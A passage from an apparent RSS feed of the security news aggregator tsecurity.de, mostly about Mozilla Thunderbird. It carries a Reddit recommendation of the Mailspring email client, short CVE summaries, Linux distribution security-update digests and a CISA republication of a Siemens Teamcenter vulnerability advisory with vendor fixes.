</item>
<item>
<title><![CDATA[Mailspring is a pretty decent email client (and actively developed)]]></title>
<description><![CDATA[https://preview.redd.it/yissw00vio1h1.png?width=2944&format=png&auto=webp&s=e197a41b5699ce32666e89abcea24c2ecbf66379 After periods of using Thunderbird, and then Geary, I was getting annoyed with their various shortcomings. At a minimum I need a one line preview of each email in the message list ...]]></description>
<link>https://tsecurity.de/de/3523959/linux-tipps/mailspring-is-a-pretty-decent-email-client-and-actively-developed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3523959/linux-tipps/mailspring-is-a-pretty-decent-email-client-and-actively-developed/</guid>
<pubDate>Sun, 17 May 2026 17:24:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://preview.redd.it/yissw00vio1h1.png?width=2944&amp;format=png&amp;auto=webp&amp;s=e197a41b5699ce32666e89abcea24c2ecbf66379">https://preview.redd.it/yissw00vio1h1.png?width=2944&amp;format=png&amp;auto=webp&amp;s=e197a41b5699ce32666e89abcea24c2ecbf66379</a></p> <p>After periods of using Thunderbird, and then Geary, I was getting annoyed with their various shortcomings.</p> <p>At a minimum I need a one line preview of each email in the message list (which isn't even on the Thunderbird roadmap). Also Thunderbird is memory heavy and still feels clunky despite the partial UI makeover. Geary is fine, but uses old toolkits and is showing its age (also no longer developed). Sometimes html messages don't render correctly in Geary (I believe it uses webkit).</p> <p>Mailspring went through a period of hardly being developed. But I think the main Dev switched to Linux last year, and now there's very frequent updates (<a href="https://www.getmailspring.com/changelog">https://www.getmailspring.com/changelog</a>). Also they abandoned needing an account to use it. Developer is responsive to bug reports on Discourse.</p> <p>Default theme is ok but dated. Switching to the inbuilt Darkside Theme (created by a graphic designer), and it looks great and modern.</p> <p><a href="https://github.com/Foundry376/Mailspring">https://github.com/Foundry376/Mailspring</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/tornado99_"> /u/tornado99_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tfmgu5/mailspring_is_a_pretty_decent_email_client_and/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tfmgu5/mailspring_is_a_pretty_decent_email_client_and/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-28285 | Mozilla Thunderbird up to 91.7 JIT Code MLoadTypedArrayElementHole out-of-bounds (Bug 1756957 / EUVD-2022-32737)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Mozilla Thunderbird up to 91.7. This affects the function MLoadTypedArrayElementHole of the component JIT Code Handler. Executing a manipulation can lead to out-of-bounds read.

This vulnerability is handled as CVE-2022-28285. The attack ca...]]></description>
<link>https://tsecurity.de/de/3523836/sicherheitsluecken/cve-2022-28285-mozilla-thunderbird-up-to-917-jit-code-mloadtypedarrayelementhole-out-of-bounds-bug-1756957-euvd-2022-32737/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3523836/sicherheitsluecken/cve-2022-28285-mozilla-thunderbird-up-to-917-jit-code-mloadtypedarrayelementhole-out-of-bounds-bug-1756957-euvd-2022-32737/</guid>
<pubDate>Sun, 17 May 2026 16:10:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.7</a>. This affects the function <code>MLoadTypedArrayElementHole</code> of the component <em>JIT Code Handler</em>. Executing a manipulation can lead to out-of-bounds read.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2022-28285">CVE-2022-28285</a>. The attack can be executed remotely. There is not any exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-28286 | Mozilla Thunderbird up to 91.7 iFrame access control (Bug 1735265 / EUVD-2022-32738)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Mozilla Thunderbird up to 91.7. This vulnerability affects unknown code of the component iFrame Handler. The manipulation leads to improper access controls.

This vulnerability is uniquely identified as CVE-2022-28286. The attack is possi...]]></description>
<link>https://tsecurity.de/de/3523833/sicherheitsluecken/cve-2022-28286-mozilla-thunderbird-up-to-917-iframe-access-control-bug-1735265-euvd-2022-32738/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3523833/sicherheitsluecken/cve-2022-28286-mozilla-thunderbird-up-to-917-iframe-access-control-bug-1735265-euvd-2022-32738/</guid>
<pubDate>Sun, 17 May 2026 16:10:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.7</a>. This vulnerability affects unknown code of the component <em>iFrame Handler</em>. The manipulation leads to improper access controls.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2022-28286">CVE-2022-28286</a>. The attack is possible to be carried out remotely. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-28289 | Mozilla Thunderbird up to 91.7 memory corruption (EUVD-2022-32741 / Nessus ID 208650)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Mozilla Thunderbird up to 91.7. Impacted is an unknown function. This manipulation causes memory corruption.

The identification of this vulnerability is CVE-2022-28289. It is possible to initiate the attack remotely. There is no exploit av...]]></description>
<link>https://tsecurity.de/de/3523829/sicherheitsluecken/cve-2022-28289-mozilla-thunderbird-up-to-917-memory-corruption-euvd-2022-32741-nessus-id-208650/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3523829/sicherheitsluecken/cve-2022-28289-mozilla-thunderbird-up-to-917-memory-corruption-euvd-2022-32741-nessus-id-208650/</guid>
<pubDate>Sun, 17 May 2026 16:10:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.7</a>. Impacted is an unknown function. This manipulation causes memory corruption.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2022-28289">CVE-2022-28289</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird-Alternativen: Starke E-Mail-Programme für Windows]]></title>
<description><![CDATA[Mit Mozilla Thunderbird steht eine leistungsfähige Gratis-E-Mail-Software bereit. Sie ist relativ bekannt, doch nur die Spitze des Eisbergs: Es existieren diverse empfehlenswerte Alternativen. Wir geben einen Überblick.]]></description>
<link>https://tsecurity.de/de/3523526/it-nachrichten/thunderbird-alternativen-starke-e-mail-programme-fuer-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3523526/it-nachrichten/thunderbird-alternativen-starke-e-mail-programme-fuer-windows/</guid>
<pubDate>Sun, 17 May 2026 12:31:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit Mozilla Thunderbird steht eine leistungsfähige Gratis-E-Mail-Software bereit. Sie ist relativ bekannt, doch nur die Spitze des Eisbergs: Es existieren diverse empfehlenswerte Alternativen. Wir geben einen Überblick.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Debian (ffmpeg, gsasl, nodejs, postgresql-15, postgresql-17, python3.9, and thunderbird), Fedora (expat, firefox, freerdp, GitPython, kernel, php, rust-podman-sequoia, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-serv...]]></description>
<link>https://tsecurity.de/de/3519855/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519855/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 15 May 2026 15:23:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (ffmpeg, gsasl, nodejs, postgresql-15, postgresql-17, python3.9, and thunderbird), <b>Fedora</b> (expat, firefox, freerdp, GitPython, kernel, php, rust-podman-sequoia, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-openpgp, rust-sequoia-sop, rust-sequoia-sq, and rust-sequoia-sqv), <b>Mageia</b> (awstats, libreoffice, perl-HTTP-Tiny, and tomcat), <b>Oracle</b> (corosync, freerdp, gimp, git-lfs, glib2, jq, kernel, krb5, libsoup3, libtiff, openexr, thunderbird, uek-kernel, and yggdrasil), <b>Red Hat</b> (podman and skopeo), <b>SUSE</b> (amazon-ssm-agent, avahi, c-ares, cairo, containerd, cpp-httplib, dnsmasq, dovecot24, ffmpeg-4, firefox, helm, ImageMagick, iproute2, kernel, krb5, libtpms, ongres-scram, ongres-stringprep, plexus-testing, maven, maven-doxia, mojo-parent, sisu, openCryptoki, openssh, perl-Text-CSV_XS, php8, python-lxml, python-Twisted-doc, python311-click, python311-GitPython, rclone, regclient, and syncthing), and <b>Ubuntu</b> (avahi).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Debian)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3517846/unix-server/security-mehrere-probleme-in-thunderbird-debian/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517846/unix-server/security-mehrere-probleme-in-thunderbird-debian/</guid>
<pubDate>Thu, 14 May 2026 22:45:54 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6267-1 thunderbird - security update]]></title>
<description><![CDATA[Multiple security issues were discovered in Thunderbird, which could
result in the execution of arbitrary code.


https://security-tracker.debian.org/tracker/DSA-6267-1]]></description>
<link>https://tsecurity.de/de/3517438/unix-server/dsa-6267-1-thunderbird-security-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517438/unix-server/dsa-6267-1-thunderbird-security-update/</guid>
<pubDate>Thu, 14 May 2026 19:01:01 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Multiple security issues were discovered in Thunderbird, which could
result in the execution of arbitrary code.

<p>
<a href="https://security-tracker.debian.org/tracker/DSA-6267-1">https://security-tracker.debian.org/tracker/DSA-6267-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Siemens Teamcenter]]></title>
<description><![CDATA[View CSAF
Summary
Siemens Teamcenter is affected by multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends to update to the latest versions.
The following vers...]]></description>
<link>https://tsecurity.de/de/3517142/it-security-nachrichten/siemens-teamcenter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517142/it-security-nachrichten/siemens-teamcenter/</guid>
<pubDate>Thu, 14 May 2026 17:07:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-134-04.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Siemens Teamcenter is affected by multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends to update to the latest versions.</strong></p>
<p>The following versions of Siemens Teamcenter are affected:</p>
<ul>
<li>Teamcenter V2312 vers:intdot/&lt;2312.0014, vers:intdot/&lt;2312.0009 (CVE-2026-33862, CVE-2026-33893, CVE-2024-4367)</li>
<li>Teamcenter V2406 vers:intdot/&lt;2406.0012, vers:intdot/&lt;2406.0006 (CVE-2026-33862, CVE-2026-33893, CVE-2024-4367)</li>
<li>Teamcenter V2412 vers:intdot/&lt;2412.0009 (CVE-2026-33862, CVE-2026-33893)</li>
<li>Teamcenter V2506 vers:intdot/&lt;2506.0005 (CVE-2026-33862, CVE-2026-33893)</li>
<li>Teamcenter V2512 vers:all/* </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 7.5</td>
<td>Siemens</td>
<td>Siemens Teamcenter</td>
<td>Improper Check for Unusual or Exceptional Conditions, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Use of Hard-coded Credentials</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-4367</a></h3>
<div class="csaf-accordion-content">
<p>A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-4367">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens Teamcenter</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>Teamcenter V2312, Teamcenter V2406</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected, known_not_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V2312.0009 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2406.0006 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/754.html">CWE-754 Improper Check for Unusual or Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-33862</a></h3>
<div class="csaf-accordion-content">
<p>The affected application does not properly encode or filter user-supplied data. This could allow an attacker to inject malicious code that can be executed by other users when they visit the affected page.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-33862">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens Teamcenter</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected, known_not_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V2312.0014 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2406.0012 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2412.0009 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2506.0005 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-33893</a></h3>
<div class="csaf-accordion-content">
<p>The affected application contains hardcoded key which is used for obfuscation stored directly into the application. This could allow an attacker to obtain these keys and misuse them to gain unauthorized access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-33893">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens Teamcenter</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected, known_not_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V2312.0014 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2406.0012 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2412.0009 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
<p><strong>Vendor fix</strong><br>Update to V2506.0005 or later version<br><a href="https://support.sw.siemens.com/product/282219420/">https://support.sw.siemens.com/product/282219420/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/798.html">CWE-798 Use of Hard-coded Credentials</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Dustin Born, Robin Plugge, and Tim Wörner of usd AG reported these vulnerabilities.</li>
</ul>
<hr>
<h2>General Recommendations</h2>
<p>As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity</p>
<hr>
<h2>Additional Resources</h2>
<p>For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories</p>
<hr>
<h2>Terms of Use</h2>
<p>The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Siemens ProductCERT SSA-827383 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-05-12</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-05-12</td>
<td>1</td>
<td>Publication Date</td>
</tr>
<tr>
<td>2026-05-14</td>
<td>2</td>
<td>Initial CISA Republication of Siemens ProductCERT SSA-827383 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (gimp, jq, and yggdrasil), Debian (nghttp2 and thunderbird), Fedora (chromium, firefox, freerdp, GitPython, kernel, kernel-headers, krb5, nano, nix, nodejs20, php, python-click, python-django5, SDL2_image, and xen), Mageia (dnsmasq, flatpak, kernel, ...]]></description>
<link>https://tsecurity.de/de/3516829/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516829/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 14 May 2026 15:13:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (gimp, jq, and yggdrasil), <b>Debian</b> (nghttp2 and thunderbird), <b>Fedora</b> (chromium, firefox, freerdp, GitPython, kernel, kernel-headers, krb5, nano, nix, nodejs20, php, python-click, python-django5, SDL2_image, and xen), <b>Mageia</b> (dnsmasq, flatpak, kernel, kmod-virtualbox, kernel-linus, perl-Net-CIDR-Lite, perl-XML-LibXML, and redis), <b>SUSE</b> (dnsmasq, firefox, jupyter-jupyterlab, kernel, krb5, libvinylapi3, log4j, Mesa, mozjs60, NetworkManager, OpenImageIO, python-Mako, python-Pillow, and python39), and <b>Ubuntu</b> (dnsmasq and nginx).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (corosync, freerdp, git-lfs, glib2, jq, kernel-rt, krb5, libpng, libtiff, openexr, and thunderbird), Debian (exim4), Mageia (apache, perl-Gazelle, php, and sed), Slackware (expat), SUSE (assimp-devel, go1.26, libQt6Svg6, python-jupyterlab, raylib, th...]]></description>
<link>https://tsecurity.de/de/3513851/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513851/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 13 May 2026 15:26:51 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (corosync, freerdp, git-lfs, glib2, jq, kernel-rt, krb5, libpng, libtiff, openexr, and thunderbird), <b>Debian</b> (exim4), <b>Mageia</b> (apache, perl-Gazelle, php, and sed), <b>Slackware</b> (expat), <b>SUSE</b> (assimp-devel, go1.26, libQt6Svg6, python-jupyterlab, raylib, thunderbird, tor, and trivy), and <b>Ubuntu</b> (exim4).]]></content:encoded>
</item>
<item>
<title><![CDATA[IMAP-Störung bei Vodafone: E-Mail-Dienst seit Tagen defekt]]></title>
<description><![CDATA[Vodafone-Kunden kämpfen seit über einer Woche mit Ausfällen beim E-Mail-Dienst. Der IMAP-Abruf über Programme wie Outlook oder Thunderbird funktioniert nicht mehr zuverlässig. Ausgerechnet jetzt erhielt der Dienst ein BSI-Zertifikat.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3511573/it-security-nachrichten/imap-stoerung-bei-vodafone-e-mail-dienst-seit-tagen-defekt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3511573/it-security-nachrichten/imap-stoerung-bei-vodafone-e-mail-dienst-seit-tagen-defekt/</guid>
<pubDate>Tue, 12 May 2026 20:24:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,158659.html"><img hspace="5" border="0" align="left" alt="Vodafone, Probleme, Ausfall, Störung" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/52904.jpg"></a>
			<a href="https://winfuture.de/special/vodafone/" title="Vodafone Special">Vodafone-Kunden</a> kämpfen seit über einer Woche mit Ausfällen beim E-Mail-Dienst. Der IMAP-Abruf über Programme wie Outlook oder Thunderbird funktioniert nicht mehr zuverlässig. Ausgerechnet jetzt erhielt der Dienst ein BSI-Zertifikat.			(<a href="https://winfuture.de/news,158659.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3507907/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507907/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Mon, 11 May 2026 19:16:19 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (corosync, freeipmi, kernel, and kernel-rt), Debian (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), Fedora (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-...]]></description>
<link>https://tsecurity.de/de/3507119/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507119/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 11 May 2026 15:14:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
